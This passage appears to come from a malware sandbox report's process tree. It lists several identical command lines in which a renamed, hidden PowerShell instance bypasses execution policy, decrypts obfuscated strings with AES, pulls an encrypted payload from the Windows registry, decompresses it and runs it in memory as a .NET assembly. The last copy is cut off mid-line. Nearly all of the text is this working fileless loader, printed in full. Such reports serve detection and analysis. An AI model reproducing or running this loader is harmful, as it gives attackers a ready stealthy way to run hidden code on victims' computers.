        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:9372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:3864
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        
        PID:9528
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = 